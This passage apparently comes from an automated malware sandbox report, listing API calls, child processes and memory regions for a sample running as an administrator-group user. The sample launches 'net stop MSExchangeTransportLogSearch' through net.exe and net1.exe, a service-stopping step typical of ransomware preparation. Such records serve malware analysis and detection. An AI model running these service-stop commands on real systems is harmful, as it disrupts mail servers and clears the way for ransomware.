hStdError=0x0)) [0142.333] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.333] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.333] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.333] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.333] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.333] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.333] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.334] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.334] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0142.335] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeTransportLogSearch", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x495f208*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeTransportLogSearch", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x495f254 | out: lpCommandLine="net stop MSExchangeTransportLogSearch", lpProcessInformation=0x495f254*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xdd4, dwThreadId=0xde8)) returned 1 [0142.342] CloseHandle (hObject=0xa4) returned 1 [0142.342] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0142.342] GetEnvironmentStringsW () returned 0x4b29ef8* [0142.342] FreeEnvironmentStringsA (penv="=") returned 1 [0142.342] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0142.575] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x495f1ec | out: lpExitCode=0x495f1ec*=0x2) returned 1 [0142.575] CloseHandle (hObject=0xa8) returned 1 [0142.575] _vsnwprintf (in: _Buffer=0x495f2d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x495f1f4 | out: _Buffer="00000002") returned 8 [0142.575] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0142.575] GetEnvironmentStringsW () returned 0x4b2b340* [0142.575] FreeEnvironmentStringsA (penv="=") returned 1 [0142.575] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0142.575] GetEnvironmentStringsW () returned 0x4b2b340* [0142.575] FreeEnvironmentStringsA (penv="=") returned 1 [0142.575] DeleteProcThreadAttributeList (in: lpAttributeList=0x495f280 | out: lpAttributeList=0x495f280) [0142.575] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.575] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0142.576] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.576] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0142.576] _get_osfhandle (_FileHandle=0) returned 0x38 [0142.576] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0142.576] SetConsoleInputExeNameW () returned 0x1 [0142.576] GetConsoleOutputCP () returned 0x1b5 [0142.576] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0142.576] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.576] exit (_Code=2) Thread: id = 781 os_tid = 0xda8 Process: id = "270" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3e8a8000" os_pid = "0xca8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "269" os_parent_pid = "0xbf4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12760 start_va = 0x7feec000 end_va = 0x7feecfff entry_point = 0x0 region_type = private name = "private_0x000000007feec000" filename = "" Region: id = 12761 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12762 start_va = 0x7113000000 end_va = 0x711301ffff entry_point = 0x0 region_type = private name = "private_0x0000007113000000" filename = "" Region: id = 12763 start_va = 0x7113020000 end_va = 0x7113033fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007113020000" filename = "" Region: id = 12764 start_va = 0x7113040000 end_va = 0x711307ffff entry_point = 0x0 region_type = private name = "private_0x0000007113040000" filename = "" Region: id = 12765 start_va = 0x7df5ff050000 end_va = 0x7ff5ff04ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff050000" filename = "" Region: id = 12766 start_va = 0x7ff6c41f0000 end_va = 0x7ff6c4212fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41f0000" filename = "" Region: id = 12767 start_va = 0x7ff6c4214000 end_va = 0x7ff6c4214fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4214000" filename = "" Region: id = 12768 start_va = 0x7ff6c421e000 end_va = 0x7ff6c421ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c421e000" filename = "" Region: id = 12769 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 12770 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12771 start_va = 0x7113000000 end_va = 0x711300ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007113000000" filename = "" Region: id = 12772 start_va = 0x7113080000 end_va = 0x711313dfff entry_point = 0x7113080000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12773 start_va = 0x7113200000 end_va = 0x71132fffff entry_point = 0x0 region_type = private name = "private_0x0000007113200000" filename = "" Region: id = 12774 start_va = 0x7ff6c40f0000 end_va = 0x7ff6c41effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c40f0000" filename = "" Region: id = 12775 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12776 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12777 start_va = 0x7113010000 end_va = 0x7113016fff entry_point = 0x0 region_type = private name = "private_0x0000007113010000" filename = "" Region: id = 12778 start_va = 0x7113140000 end_va = 0x711317ffff entry_point = 0x0 region_type = private name = "private_0x0000007113140000" filename = "" Region: id = 12779 start_va = 0x7113180000 end_va = 0x7113180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007113180000" filename = "" Region: id = 12780 start_va = 0x7113190000 end_va = 0x7113196fff entry_point = 0x0 region_type = private name = "private_0x0000007113190000" filename = "" Region: id = 12781 start_va = 0x71131a0000 end_va = 0x71131a0fff entry_point = 0x0 region_type = private name = "private_0x00000071131a0000" filename = "" Region: id = 12782 start_va = 0x71131b0000 end_va = 0x71131b0fff entry_point = 0x0 region_type = private name = "private_0x00000071131b0000" filename = "" Region: id = 12783 start_va = 0x71131c0000 end_va = 0x71131cffff entry_point = 0x0 region_type = private name = "private_0x00000071131c0000" filename = "" Region: id = 12784 start_va = 0x7113300000 end_va = 0x7113487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007113300000" filename = "" Region: id = 12785 start_va = 0x7113490000 end_va = 0x7113610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007113490000" filename = "" Region: id = 12786 start_va = 0x7113620000 end_va = 0x7114a1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007113620000" filename = "" Region: id = 12787 start_va = 0x7ff6c421c000 end_va = 0x7ff6c421dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c421c000" filename = "" Region: id = 12788 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 12789 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 12790 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12791 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 12792 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12793 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12794 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12795 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12796 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12797 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12798 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 12799 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 778 os_tid = 0xcb0 Thread: id = 779 os_tid = 0xcc4 Thread: id = 780 os_tid = 0xdc8 Process: id = "271" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x166a7000" os_pid = "0xdd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "269" os_parent_pid = "0xbf4" cmd_line = "net stop MSExchangeTransportLogSearch" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12813 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 12814 start_va = 0xf90000 end_va = 0x4f8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 12815 start_va = 0x4f90000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 12816 start_va = 0x4fb0000 end_va = 0x4fb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 12817 start_va = 0x4fc0000 end_va = 0x4fd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fc0000" filename = "" Region: id = 12818 start_va = 0x4fe0000 end_va = 0x501ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 12819 start_va = 0x5020000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000005020000" filename = "" Region: id = 12820 start_va = 0x50a0000 end_va = 0x50a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050a0000" filename = "" Region: id = 12821 start_va = 0x50b0000 end_va = 0x50b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050b0000" filename = "" Region: id = 12822 start_va = 0x50c0000 end_va = 0x50c1fff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 12823 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12824 start_va = 0x7e650000 end_va = 0x7e672fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e650000" filename = "" Region: id = 12825 start_va = 0x7e673000 end_va = 0x7e673fff entry_point = 0x0 region_type = private name = "private_0x000000007e673000" filename = "" Region: id = 12826 start_va = 0x7e67c000 end_va = 0x7e67cfff entry_point = 0x0 region_type = private name = "private_0x000000007e67c000" filename = "" Region: id = 12827 start_va = 0x7e67d000 end_va = 0x7e67ffff entry_point = 0x0 region_type = private name = "private_0x000000007e67d000" filename = "" Region: id = 12828 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12829 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12830 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12831 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12832 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12833 start_va = 0x5270000 end_va = 0x527ffff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 12834 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12835 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12836 start_va = 0x53c0000 end_va = 0x54bffff entry_point = 0x0 region_type = private name = "private_0x00000000053c0000" filename = "" Region: id = 12837 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 782 os_tid = 0xde8 Thread: id = 783 os_tid = 0xd10 Process: id = "272" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x15937000" os_pid = "0xb08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "271" os_parent_pid = "0xdd4" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeTransportLogSearch" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12838 start_va = 0x8f0000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 12839 start_va = 0x910000 end_va = 0x911fff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 12840 start_va = 0x920000 end_va = 0x933fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 12841 start_va = 0x940000 end_va = 0x97ffff entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 12842 start_va = 0x980000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 12843 start_va = 0xa00000 end_va = 0xa03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 12844 start_va = 0xa10000 end_va = 0xa10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 12845 start_va = 0xa20000 end_va = 0xa21fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 12846 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 12847 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 12848 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12849 start_va = 0x7efc0000 end_va = 0x7efe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efc0000" filename = "" Region: id = 12850 start_va = 0x7efe5000 end_va = 0x7efe5fff entry_point = 0x0 region_type = private name = "private_0x000000007efe5000" filename = "" Region: id = 12851 start_va = 0x7efe8000 end_va = 0x7efe8fff entry_point = 0x0 region_type = private name = "private_0x000000007efe8000" filename = "" Region: id = 12852 start_va = 0x7efed000 end_va = 0x7efeffff entry_point = 0x0 region_type = private name = "private_0x000000007efed000" filename = "" Region: id = 12853 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12854 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12855 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12856 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12857 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12858 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 12859 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12860 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12861 start_va = 0xc60000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 12862 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12863 start_va = 0x8f0000 end_va = 0x8fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 12864 start_va = 0x900000 end_va = 0x903fff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 12865 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 12866 start_va = 0xaa0000 end_va = 0xb5dfff entry_point = 0xaa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12867 start_va = 0xb60000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 12868 start_va = 0xf00000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 12869 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 12870 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 12871 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 12872 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 12873 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 12874 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 12875 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 12876 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 12877 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 12878 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 12879 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: 